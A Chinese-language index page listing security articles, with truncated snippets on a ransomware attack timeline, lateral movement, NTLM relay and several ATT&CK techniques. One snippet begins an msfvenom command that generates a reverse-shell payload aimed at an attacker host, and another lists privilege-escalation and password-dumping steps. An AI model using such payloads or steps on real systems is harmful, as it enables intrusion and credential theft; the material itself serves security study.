A网络安全专家仔细追踪了一次复杂的勒索软件攻击的时间线,从最初的漏洞利用到部署 Dagon Locker 勒索软件历时了 29 天。该案例研究不仅阐明了网络犯罪分子的效率和持久性,还强调了组织当今面临...
一次勒索攻击案例追踪 | 从最初的漏洞利用到最终的部署勒索软件 历时29天
网络安全专家仔细追踪了一次复杂的勒索软件攻击的时间线,从最初的漏洞利用到部署 Dagon Locker 勒索软件历时了 29 天。该案例研究不仅阐明了网络犯罪分子的效率和持久性,还强调了组织当今面临的...
内网渗透之横向移动rdp&winrm&winrs&spn&kerberos
0x00 准备环境:god.org cs上线 win2008web 提权利用ms14-058 抓取hash和明文密码(当获取到其他主机就重复提权和抓取密码) 扫描存活主机,扫描端口 代理转发-转发上线...
横向移动 - NTLM 中继攻击
在这篇文章中,我们将探索可用于执行 NTLM 中继攻击以横向移动并访问网络中不同机器和资源的不同技术。首先,我们将借鉴我的上一篇文章:LLMNR Poisoning with Responder,并了...
揭秘内网安全:红队如何玩转渗透测试?(文末赠书)
近年来,网络安全成为国家安全和经济社会发展的关键领域,国内涌现出很多网络安全培训机构,但好教材凤毛麟角。2020年1月,《内网安全攻防:渗透测试实战指南》一经出版,就引爆了国内网络安全领域,填补了国内...
红队战术 - WMI + MSI 横向移动
执行在 MSI(Microsoft 安装程序包)中生成恶意负载:攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...
ATT&CK - 远程服务的利用
远程服务的利用 软件漏洞利用是指攻击者利用程序、服务或操作系统软件或内核本身的编程错误来执行攻击者控制的代码时。 远程服务利用的后渗透攻击的一个常见目标是横向移动以获得对远程系统的访问。 攻击者可能需...
ATT&CK - 通过可移动媒体进行复制
通过可移动媒体进行复制 攻击者可以通过将恶意软件复制到可移动的媒体上,利用媒体插入系统并执行的自动运行特性,转移到系统,这些系统大概在未连通或气隙网络上。在横向移动 (Lateral Movement...
ATT&CK - 后渗透攻击的工具开发
后渗透攻击的工具开发 在完成攻击后,攻击者可以使用其他工具来达成他们的最终目标。这可能包括用于深入探索系统、在网络中横向移动、窃取数据或销毁数据的工具。 检测 可通过常见防御检测(是/否/部分): 否...
ATT&CK - 横向移动
横向移动 横向移动(Lateral Movement)包括使攻击者能够访问和控制网络上的远程系统的技术,但不一定包括在远程系统上执行的工具。横向移动技术允许攻击者收集系统信息而无需额外的工具,如远程访...
ATT&CK - 污染共享内容
污染共享内容 存储在网络驱动器或其他共享位置上的内容可能被污染,通过添加恶意程序、脚本或漏洞利用代码到其他有效文件中。 一旦用户打开受污染的共享内容,就会执行恶意部分内容,从而在远程系统上运行攻击者的...
ATT&CK - 网络共享披露
网络共享披露 网络中通常包含共享的网络驱动器和文件夹,允许用户跨网络访问不同系统上的文件目录。 Windows 在 Windows 网络上,系统通过 SMB 协议进行文件共享。 Net 可用来查询远程...
15